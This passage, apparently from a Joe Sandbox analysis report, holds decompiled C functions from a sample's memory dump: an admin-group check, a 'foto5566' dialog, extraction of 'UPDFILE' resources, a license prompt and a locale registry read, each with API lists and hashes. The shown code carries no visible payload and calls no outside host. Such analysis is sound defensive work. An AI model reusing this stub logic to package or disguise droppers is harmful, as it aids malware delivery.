					if(_t20 != 0) {
						 *_t37 = 0;
						_t28 = 1;
						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
							_t37 = _t39;
							 *0xcea288(0, _v24, _v28);
							_v20();
							if(_t39 != _t39) {
								asm("int 0x29");
							}
							FreeSid(_v24);
						}
					}
					FreeLibrary(_t36);
				}
				return E00CE6CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
			}

0x00ce17f6
0x00ce17fd
0x00ce1805
0x00ce180b
0x00ce180d
0x00ce1815
0x00ce1818
0x00ce1820
0x00ce1824
0x00ce182c
0x00ce1832
0x00ce1837
0x00ce1851
0x00ce1854
0x00ce185d
0x00ce1862
0x00ce186c
0x00ce1872
0x00ce1877
0x00ce187e
0x00ce187e
0x00ce1883
0x00ce1883
0x00ce185d
0x00ce188a
0x00ce188a
0x00ce18a2

APIs

LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00CE18DD), ref: 00CE181A
GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00CE182C
AllocateAndInitializeSid.ADVAPI32(00CE18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00CE18DD), ref: 00CE1855
FreeSid.ADVAPI32(?,?,?,?,00CE18DD), ref: 00CE1883
FreeLibrary.KERNEL32(00000000,?,?,?,00CE18DD), ref: 00CE188A

Strings

CheckTokenMembership, xrefs: 00CE1826
advapi32.dll, xrefs: 00CE1810

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: FreeLibrary$AddressAllocateInitializeLoadProc
String ID: CheckTokenMembership$advapi32.dll
API String ID: 4204503880-1888249752
Opcode ID: f6bd1c572637b73fe7b90a3be96dc059eae295fe3a887b61058d5aa537ccec76
Instruction ID: 27ce3f2c1f4964335809f2dc02cccf3c237d68db6deaf0f8442494a097655eaa
Opcode Fuzzy Hash: f6bd1c572637b73fe7b90a3be96dc059eae295fe3a887b61058d5aa537ccec76
Instruction Fuzzy Hash: 3E11B631E00249AFDB109FA5DC89BBEBB78EF44710F150169FA16E7290DB309D14CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00CE3450 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CE3450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t7;
				void* _t11;
				struct HWND__* _t12;
				int _t22;
				struct HWND__* _t24;

				_t7 = _a8 - 0x10;
				if(_t7 == 0) {
					EndDialog(_a4, 2);
					L11:
					return 1;
				}
				_t11 = _t7 - 0x100;
				if(_t11 == 0) {
					_t12 = GetDesktopWindow();
					_t24 = _a4;
					E00CE43D0(_t24, _t12);
					SetWindowTextA(_t24, "foto5566");
					SetDlgItemTextA(_t24, 0x838,  *0xce9404);
					SetForegroundWindow(_t24);
					goto L11;
				}
				if(_t11 == 1) {
					_t22 = _a12;
					if(_t22 < 6) {
						goto L11;
					}
					if(_t22 <= 7) {
						L8:
						EndDialog(_a4, _t22);
						return 1;
					}
					if(_t22 != 0x839) {
						goto L11;
					}
					 *0xce91dc = 1;
					goto L8;
				}
				return 0;
			}

0x00ce3459
0x00ce345c
0x00ce34d8
0x00ce34de
0x00000000
0x00ce34e0
0x00ce345e
0x00ce3463
0x00ce349a
0x00ce34a0
0x00ce34a7
0x00ce34b2
0x00ce34c4
0x00ce34cb
0x00000000
0x00ce34cb
0x00ce3468
0x00ce346e
0x00ce3474
0x00000000
0x00000000
0x00ce347c
0x00ce348c
0x00ce3490
0x00000000
0x00ce3496
0x00ce3484
0x00000000
0x00000000
0x00ce3486
0x00000000
0x00ce3486
0x00000000

APIs

EndDialog.USER32(?,?), ref: 00CE3490
GetDesktopWindow.USER32 ref: 00CE349A
SetWindowTextA.USER32(?,foto5566), ref: 00CE34B2
SetDlgItemTextA.USER32(?,00000838), ref: 00CE34C4
SetForegroundWindow.USER32(?), ref: 00CE34CB
EndDialog.USER32(?,00000002), ref: 00CE34D8

Strings

foto5566, xrefs: 00CE34AC

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: Window$DialogText$DesktopForegroundItem
String ID: foto5566
API String ID: 852535152-645582358
Opcode ID: 49319648d9a15e080fada3718cd00fe5cab4e25c9c2e350d2397d49e5beffb05
Instruction ID: 89020f2e6051cdc9e3c09442774bb49311e915000e82373fc36ad03c1a95b9a4
Opcode Fuzzy Hash: 49319648d9a15e080fada3718cd00fe5cab4e25c9c2e350d2397d49e5beffb05
Instruction Fuzzy Hash: 2D018C312401D4ABCB1A5B67DC4CB6D3E64EB49701F008014F9569B5E0CA30AB42DB82

Uniqueness

Uniqueness Score: -1.00%

Function 00CE2AAC Relevance: 12.1, APIs: 8, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00CE2AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				int _t21;
				char _t32;
				intOrPtr _t34;
				char* _t38;
				char _t42;
				char* _t44;
				CHAR* _t52;
				intOrPtr* _t55;
				CHAR* _t59;
				void* _t62;
				CHAR* _t64;
				CHAR* _t65;
				signed int _t66;

				_t60 = __edx;
				_t16 =  *0xce8004; // 0xd1db73d
				_t17 = _t16 ^ _t66;
				_v8 = _t16 ^ _t66;
				_t65 = _a4;
				_t44 = __edx;
				_t64 = __ecx;
				if( *((char*)(__ecx)) != 0) {
					GetModuleFileNameA( *0xce9a3c,  &_v268, 0x104);
					while(1) {
						_t17 =  *_t64;
						if(_t17 == 0) {
							break;
						}
						_t21 = IsDBCSLeadByte(_t17);
						 *_t65 =  *_t64;
						if(_t21 != 0) {
							_t65[1] = _t64[1];
						}
						if( *_t64 != 0x23) {
							L19:
							_t65 = CharNextA(_t65);
						} else {
							_t64 = CharNextA(_t64);
							if(CharUpperA( *_t64) != 0x44) {
								if(CharUpperA( *_t64) != 0x45) {
									if( *_t64 == 0x23) {
										goto L19;
									}
								} else {
									E00CE1680(_t65, E00CE17C8(_t44, _t65),  &_v268);
									_t52 = _t65;
									_t14 =  &(_t52[1]); // 0x2
									_t60 = _t14;
									do {
										_t32 =  *_t52;
										_t52 =  &(_t52[1]);
									} while (_t32 != 0);
									goto L17;
								}
							} else {
								E00CE65E8( &_v268);
								_t55 =  &_v268;
								_t62 = _t55 + 1;
								do {
									_t34 =  *_t55;
									_t55 = _t55 + 1;
								} while (_t34 != 0);
								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
								if(_t38 != 0 &&  *_t38 == 0x5c) {
									 *_t38 = 0;
								}
								E00CE1680(_t65, E00CE17C8(_t44, _t65),  &_v268);
								_t59 = _t65;
								_t12 =  &(_t59[1]); // 0x2
								_t60 = _t12;
								do {
									_t42 =  *_t59;
									_t59 =  &(_t59[1]);
								} while (_t42 != 0);
								L17:
								_t65 =  &(_t65[_t52 - _t60]);
							}
						}
						_t64 = CharNextA(_t64);
					}
					 *_t65 = _t17;
				}
				return E00CE6CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
			}

0x00ce2aac
0x00ce2ab7
0x00ce2abc
0x00ce2abe
0x00ce2ac3
0x00ce2ac6
0x00ce2ac9
0x00ce2ace
0x00ce2ae6
0x00ce2bdc
0x00ce2bdc
0x00ce2be0
0x00000000
0x00000000
0x00ce2af2
0x00ce2afc
0x00ce2b00
0x00ce2b05
0x00ce2b05
0x00ce2b0b
0x00ce2bca
0x00ce2bd1
0x00ce2b11
0x00ce2b18
0x00ce2b26
0x00ce2b99
0x00ce2bc8
0x00000000
0x00000000
0x00ce2b9b
0x00ce2bae
0x00ce2bb3
0x00ce2bb5
0x00ce2bb5
0x00ce2bb8
0x00ce2bb8
0x00ce2bba
0x00ce2bbb
0x00000000
0x00ce2bb8
0x00ce2b28
0x00ce2b2e
0x00ce2b33
0x00ce2b39
0x00ce2b3c
0x00ce2b3c
0x00ce2b3e
0x00ce2b3f
0x00ce2b55
0x00ce2b5d
0x00ce2b64
0x00ce2b64
0x00ce2b7a
0x00ce2b7f
0x00ce2b81
0x00ce2b81
0x00ce2b84
0x00ce2b84
0x00ce2b86
0x00ce2b87
0x00ce2bbf
0x00ce2bc1
0x00ce2bc1
0x00ce2b26
0x00ce2bda
0x00ce2bda
0x00ce2be6
0x00ce2be6
0x00ce2bf8

APIs

GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00CE2AE6
IsDBCSLeadByte.KERNEL32(00000000), ref: 00CE2AF2
CharNextA.USER32(?), ref: 00CE2B12
CharUpperA.USER32 ref: 00CE2B1E
CharPrevA.USER32(?,?), ref: 00CE2B55
CharNextA.USER32(?), ref: 00CE2BD4

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
String ID:
API String ID: 571164536-0
Opcode ID: 5da464142ee751558da993a4cfc232323fe07c4f44548283b5abef0b168389e4
Instruction ID: 4e28bf53f62be13beba47279b1fc3b02d646aac5ec81a2de3b2c3b7e063faf35
Opcode Fuzzy Hash: 5da464142ee751558da993a4cfc232323fe07c4f44548283b5abef0b168389e4
Instruction Fuzzy Hash: ED4101346082C59FDB159F358C54BFD7BAD9F56310F18409AE8C387202DB359E868BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CE43D0 Relevance: 10.6, APIs: 7, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00CE43D0(struct HWND__* __ecx, struct HWND__* __edx) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				int _v52;
				intOrPtr _v56;
				int _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				void* _t53;
				intOrPtr _t56;
				int _t59;
				struct HWND__* _t63;
				struct HWND__* _t67;
				struct HWND__* _t68;
				struct HDC__* _t69;
				int _t72;
				signed int _t74;

				_t63 = __edx;
				_t29 =  *0xce8004; // 0xd1db73d
				_v8 = _t29 ^ _t74;
				_t68 = __edx;
				_v44 = __ecx;
				GetWindowRect(__ecx,  &_v40);
				_t53 = _v40.bottom - _v40.top;
				_v48 = _v40.right - _v40.left;
				GetWindowRect(_t68,  &_v24);
				_v56 = _v24.bottom - _v24.top;
				_t69 = GetDC(_v44);
				_v52 = GetDeviceCaps(_t69, 8);
				_v60 = GetDeviceCaps(_t69, 0xa);
				ReleaseDC(_v44, _t69);
				_t56 = _v48;
				asm("cdq");
				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
				_t67 = 0;
				if(_t72 >= 0) {
					_t63 = _v52;
					if(_t72 + _t56 > _t63) {
						_t72 = _t63 - _t56;
					}
				} else {
					_t72 = _t67;
				}
				asm("cdq");
				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
				if(_t59 >= 0) {
					_t63 = _v60;
					if(_t59 + _t53 > _t63) {
						_t59 = _t63 - _t53;
					}
				} else {
					_t59 = _t67;
				}
				return E00CE6CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
			}

0x00ce43d0
0x00ce43d8
0x00ce43df
0x00ce43e6
0x00ce43ec
0x00ce43f1
0x00ce4400
0x00ce4403
0x00ce440b
0x00ce4420
0x00ce4429
0x00ce4437
0x00ce4444
0x00ce4447
0x00ce444d
0x00ce4454
0x00ce445b
0x00ce4460
0x00ce4461
0x00ce4467
0x00ce446f
0x00ce4473
0x00ce4473
0x00ce4463
0x00ce4463
0x00ce4463
0x00ce447a
0x00ce4481
0x00ce4484
0x00ce448a
0x00ce4492
0x00ce4496
0x00ce4496
0x00ce4486
0x00ce4486
0x00ce4486
0x00ce44b8

APIs

GetWindowRect.USER32(?,?), ref: 00CE43F1
GetWindowRect.USER32(00000000,?), ref: 00CE440B
GetDC.USER32(?), ref: 00CE4423
GetDeviceCaps.GDI32(00000000,00000008), ref: 00CE442E
GetDeviceCaps.GDI32(00000000,0000000A), ref: 00CE443A
ReleaseDC.USER32(?,00000000), ref: 00CE4447
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 00CE44A2

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: Window$CapsDeviceRect$Release
String ID:
API String ID: 2212493051-0
Opcode ID: 543d7157787ecbf24d305b323f4298cb9ec84481c5ee4af6cc6d78f2e2850687
Instruction ID: 1acc09917a1a91e8d79f44fd5371be8cff9407e483f109b44823a521d63fb887
Opcode Fuzzy Hash: 543d7157787ecbf24d305b323f4298cb9ec84481c5ee4af6cc6d78f2e2850687
Instruction Fuzzy Hash: 36314032F00159AFCB14CFB9DD89AEEBBB5EB89310F154169F905F7290DA306D058B60

Uniqueness

Uniqueness Score: -1.00%

Function 00CE6298 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00CE6298(intOrPtr __ecx, intOrPtr* __edx) {
				signed int _v8;
				char _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				struct HRSRC__* _t21;
				intOrPtr _t26;
				void* _t30;
				struct HINSTANCE__* _t36;
				intOrPtr* _t40;
				void* _t41;
				intOrPtr* _t44;
				intOrPtr* _t45;
				void* _t47;
				signed int _t50;
				struct HINSTANCE__* _t51;

				_t44 = __edx;
				_t16 =  *0xce8004; // 0xd1db73d
				_v8 = _t16 ^ _t50;
				_t46 = 0;
				_v32 = __ecx;
				_v36 = 0;
				_t36 = 1;
				E00CE171E( &_v28, 0x14, "UPDFILE%lu", 0);
				while(1) {
					_t51 = _t51 + 0x10;
					_t21 = FindResourceA(_t46,  &_v28, 0xa);
					if(_t21 == 0) {
						break;
					}
					_t45 = LockResource(LoadResource(_t46, _t21));
					if(_t45 == 0) {
						 *0xce9124 = 0x80070714;
						_t36 = _t46;
					} else {
						_t5 = _t45 + 8; // 0x8
						_t44 = _t5;
						_t40 = _t44;
						_t6 = _t40 + 1; // 0x9
						_t47 = _t6;
						do {
							_t26 =  *_t40;
							_t40 = _t40 + 1;
						} while (_t26 != 0);
						_t41 = _t40 - _t47;
						_t46 = _t51;
						_t7 = _t41 + 1; // 0xa
						 *0xcea288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
						_t30 = _v32();
						if(_t51 != _t51) {
							asm("int 0x29");
						}
						_push(_t45);
						if(_t30 == 0) {
							_t36 = 0;
							FreeResource(??);
						} else {
							FreeResource();
							_v36 = _v36 + 1;
							E00CE171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
							_t46 = 0;
							continue;
						}
					}
					L12:
					return E00CE6CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
				}
				goto L12;
			}

0x00ce6298
0x00ce62a0
0x00ce62a7
0x00ce62ad
0x00ce62af
0x00ce62bb
0x00ce62c3
0x00ce62c4
0x00ce633b
0x00ce633b
0x00ce6345
0x00ce634d
0x00000000
0x00000000
0x00ce62da
0x00ce62de
0x00ce635f
0x00ce6369
0x00ce62e0
0x00ce62e0
0x00ce62e0
0x00ce62e3
0x00ce62e5
0x00ce62e5
0x00ce62e8
0x00ce62e8
0x00ce62ea
0x00ce62eb
0x00ce62ef
0x00ce62f1
0x00ce62f3
0x00ce6302
0x00ce6308
0x00ce630d
0x00ce6314
0x00ce6314
0x00ce6316
0x00ce6319
0x00ce6355
0x00ce6357
0x00ce631b
0x00ce631b
0x00ce6331
0x00ce6334
0x00ce6339
0x00000000
0x00ce6339
0x00ce6319
0x00ce636b
0x00ce637d
0x00ce637d
0x00000000

APIs

Part of subcall function 00CE171E: _vsnprintf.MSVCRT ref: 00CE1750

LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,00CE51CA,00000004,00000024,00CE2F71,?,00000002,00000000), ref: 00CE62CD
LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,00CE51CA,00000004,00000024,00CE2F71,?,00000002,00000000), ref: 00CE62D4
FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00CE51CA,00000004,00000024,00CE2F71,?,00000002,00000000), ref: 00CE631B
FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00CE6345
FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00CE51CA,00000004,00000024,00CE2F71,?,00000002,00000000), ref: 00CE6357

Strings

UPDFILE%lu, xrefs: 00CE62B3, 00CE6329

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: Resource$Free$FindLoadLock_vsnprintf
String ID: UPDFILE%lu
API String ID: 2922116661-2329316264
Opcode ID: 5b7a6ce1b3e4b2ae62934e52e9ec956b9560d47b6ddd657ab1b4b69a6c5ef436
Instruction ID: ae1838a567e31551609880934ea2ec88cb7f8a3080e0f4b6ae1d17498008f16a
Opcode Fuzzy Hash: 5b7a6ce1b3e4b2ae62934e52e9ec956b9560d47b6ddd657ab1b4b69a6c5ef436
Instruction Fuzzy Hash: 4D213775A00259AFCB109F66CC85AFF7B78FF48750B140129F912A7211DB359D028BE1

Uniqueness

Uniqueness Score: -1.00%

Function 00CE681F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00CE681F(void* __ebx) {
				signed int _v8;
				char _v20;
				struct _OSVERSIONINFOA _v168;
				void* _v172;
				int* _v176;
				int _v180;
				int _v184;
				void* __edi;
				void* __esi;
				signed int _t19;
				long _t31;
				signed int _t35;
				void* _t36;
				intOrPtr _t41;
				signed int _t44;

				_t36 = __ebx;
				_t19 =  *0xce8004; // 0xd1db73d
				_v8 = _t19 ^ _t44;
				_t41 =  *0xce81d8; // 0xfffffffe
				_t43 = 0;
				_v180 = 0xc;
				_v176 = 0;
				if(_t41 == 0xfffffffe) {
					 *0xce81d8 = 0;
					_v168.dwOSVersionInfoSize = 0x94;
					if(GetVersionExA( &_v168) == 0) {
						L12:
						_t41 =  *0xce81d8; // 0xfffffffe
					} else {
						_t41 = 1;
						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
							goto L12;
						} else {
							_t31 = RegQueryValueExA(_v172, 0xce1140, 0,  &_v184,  &_v20,  &_v180);
							_t43 = _t31;
							RegCloseKey(_v172);
							if(_t31 != 0) {
								goto L12;
							} else {
								_t40 =  &_v176;
								if(E00CE66F9( &_v20,  &_v176) == 0) {
									goto L12;
								} else {
									_t35 = _v176 & 0x000003ff;
									if(_t35 == 1 || _t35 == 0xd) {
										 *0xce81d8 = _t41;
									} else {
										goto L12;
									}
								}
							}
						}
					}
				}
				return E00CE6CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
			}

0x00ce681f
0x00ce682a
0x00ce6831
0x00ce6836
0x00ce683c
0x00ce683e
0x00ce6848
0x00ce6851
0x00ce685d
0x00ce6864
0x00ce6876
0x00ce693a
0x00ce693a
0x00ce687c
0x00ce687e
0x00ce6885
0x00000000
0x00ce68d6
0x00ce68f4
0x00ce6900
0x00ce6902
0x00ce690a
0x00000000
0x00ce690c
0x00ce690c
0x00ce691c
0x00000000
0x00ce691e
0x00ce6924
0x00ce692b
0x00ce6932
0x00000000
0x00000000
0x00000000
0x00ce692b
0x00ce691c
0x00ce690a
0x00ce6885
0x00ce6876
0x00ce6951

APIs

GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00CE686E
GetSystemMetrics.USER32(0000004A), ref: 00CE68A7
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00CE68CC
RegQueryValueExA.ADVAPI32(?,00CE1140,00000000,?,?,0000000C), ref: 00CE68F4
RegCloseKey.ADVAPI32(?), ref: 00CE6902

Part of subcall function 00CE66F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,00CE691A), ref: 00CE6741

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 00CE68C2

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
String ID: Control Panel\Desktop\ResourceLocale
API String ID: 3346862599-1109908249
Opcode ID: 3d37efff6ee9d9bbb45b5054cb6060b861dccff8a633a5fce3089aa63b019587
Instruction ID: 51cc4a5e101b8d529169f8fdd2c35dec2f1bc959c0f3bde6a6b0d6e4579eda06
Opcode Fuzzy Hash: 3d37efff6ee9d9bbb45b5054cb6060b861dccff8a633a5fce3089aa63b019587
Instruction Fuzzy Hash: DD31B131A50298DFDB20CB12CC84BAEB778EB517A4F0401A5E94DAB141DB309E89CF52

Uniqueness

Uniqueness Score: -1.00%

Function 00CE3A3F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 73
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CE3A3F(void* __eflags) {
				void* _t3;
				void* _t9;
				CHAR* _t16;

				_t16 = "LICENSE";
				_t1 = E00CE468F(_t16, 0, 0) + 1; // 0x1
				_t3 = LocalAlloc(0x40, _t1);
				 *0xce8d4c = _t3;
				if(_t3 != 0) {
					_t19 = _t16;
					if(E00CE468F(_t16, _t3, _t28) != 0) {
						if(lstrcmpA( *0xce8d4c, "<None>") == 0) {
							LocalFree( *0xce8d4c);
							L9:
							 *0xce9124 = 0;
							return 1;
						}
						_t9 = E00CE6517(_t19, 0x7d1, 0, E00CE3100, 0, 0);
						LocalFree( *0xce8d4c);
						if(_t9 != 0) {
							goto L9;
						}
						 *0xce9124 = 0x800704c7;
						L2:
						return 0;
					}
					E00CE44B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree( *0xce8d4c);
					 *0xce9124 = 0x80070714;
					goto L2;
				}
				E00CE44B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0xce9124 = E00CE6285();
				goto L2;
			}

0x00ce3a46
0x00ce3a57
0x00ce3a5d
0x00ce3a63
0x00ce3a6a
0x00ce3a91
0x00ce3a9a
0x00ce3ad8
0x00ce3b13
0x00ce3b19
0x00ce3b1b
0x00000000
0x00ce3b21
0x00ce3ae7
0x00ce3af4
0x00ce3afc
0x00000000
0x00000000
0x00ce3afe
0x00ce3a87
0x00000000
0x00ce3a87
0x00ce3aa8
0x00ce3ab3
0x00ce3ab9
0x00000000
0x00ce3ab9
0x00ce3a78
0x00ce3a82
0x00000000

APIs

Part of subcall function 00CE468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00CE46A0
Part of subcall function 00CE468F: SizeofResource.KERNEL32(00000000,00000000,?,00CE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00CE46A9
Part of subcall function 00CE468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00CE46C3
Part of subcall function 00CE468F: LoadResource.KERNEL32(00000000,00000000,?,00CE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00CE46CC
Part of subcall function 00CE468F: LockResource.KERNEL32(00000000,?,00CE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00CE46D3
Part of subcall function 00CE468F: memcpy_s.MSVCRT ref: 00CE46E5
Part of subcall function 00CE468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00CE46EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00CE2F64,?,00000002,00000000), ref: 00CE3A5D
LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00CE3AB3

Part of subcall function 00CE44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00CE4518
Part of subcall function 00CE44B9: MessageBoxA.USER32(?,?,foto5566,00010010), ref: 00CE4554

Part of subcall function 00CE6285: GetLastError.KERNEL32(00CE5BBC), ref: 00CE6285

lstrcmpA.KERNEL32(<None>,00000000), ref: 00CE3AD0
LocalFree.KERNEL32 ref: 00CE3B13

Part of subcall function 00CE6517: FindResourceA.KERNEL32(00CE0000,000007D6,00000005), ref: 00CE652A
Part of subcall function 00CE6517: LoadResource.KERNEL32(00CE0000,00000000,?,?,00CE2EE8,00000000,00CE19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00CE6538
Part of subcall function 00CE6517: DialogBoxIndirectParamA.USER32(00CE0000,00000000,00000547,00CE19E0,00000000), ref: 00CE6557
Part of subcall function 00CE6517: FreeResource.KERNEL32(00000000,?,?,00CE2EE8,00000000,00CE19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00CE6560

LocalFree.KERNEL32(00000000,00CE3100,00000000,00000000), ref: 00CE3AF4

Strings

LICENSE, xrefs: 00CE3A46
<None>, xrefs: 00CE3AC5

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
String ID: <None>$LICENSE
API String ID: 2414642746-383193767
Opcode ID: a9c2b8849e09b46a7d80ddba0a7663071d5a356937cbe72c5599b3fc89b530d6
Instruction ID: c35715399fe08b177fc50a0d06ab941311357d48f7ec73e2bcf16ce8693a5436
Opcode Fuzzy Hash: a9c2b8849e09b46a7d80ddba0a7663071d5a356937cbe72c5599b3fc89b530d6
